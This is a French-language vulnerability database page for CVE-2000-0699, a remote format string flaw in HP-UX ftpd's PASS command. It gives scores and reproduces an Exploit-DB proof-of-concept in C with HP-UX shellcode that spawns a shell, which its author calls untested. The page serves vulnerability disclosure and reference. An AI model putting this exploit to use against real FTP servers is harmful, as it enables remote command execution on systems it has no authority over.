CVE-2000-0699 : Détail

CVE-2000-0699

2.06%V3
Network
2002-03-09
04h00 +00:00
2002-02-21
23h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Format string vulnerability in ftpd in HP-UX 10.20 allows remote attackers to cause a denial of service or execute arbitrary commands via format strings in the PASS command.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 212

Date de publication : 2000-11-30 23h00 +00:00
Auteur : venglin
EDB Vérifié : Yes

/* theoretical exploit for hpux ftpd vulnerability */ /* not tested anywhere, needs tweaking */ /* (c) 2000 by babcia padlina ltd. <venglin@freebsd.lublin.pl> */ #include <stdio.h> #include <stdlib.h> #define NOPS 100 #define BUFSIZE 1024 char shellcode[] = /* HP-UX shellcode */ "\x34\x16\x05\x06\x96\xd6\x05\x34\x20\x20\x08\x01\xe4\x20\xe0\x08\x0b" "\x5a\x02\x9a\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41" "\x04\x02\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02" "\x98\x34\x16\x04\xbe\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34" "\xde\xad\xca\xfe\x2f\x62\x69\x6e\x2f\x73\x68"; char nop[] = "\x08\x21\x02\x80"; /* PA-RISC NOP */ unsigned long ret = 0xdeadbeef; int main(argc, argv) int argc; char **argv; { int stackofs; char buf[BUFSIZ*2]; int i; for (strcpy(buf, "PASS "),i=0;i<NOPS;i++) strcat(buf, nop); sprintf(buf+strlen(buf), "%s%%.%dd%c%c%c%c", shellcode, BUFSIZE-strlen(shellcode)-NOPS*4-4, ((int)ret & 0xff), (((int)ret & 0xff00) >> 8), (((int)ret & 0xff0000) >> 16), (((int)ret & 0xff000000) >> 24)); printf("USER ftp\r\n%s\r\n", buf); exit(0); } // milw0rm.com [2000-12-01]

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 10.20

Hp>>Hp-ux >> Version 11.00

Références

http://www.securityfocus.com/bid/1560
Tags : vdb-entry, x_refsource_BID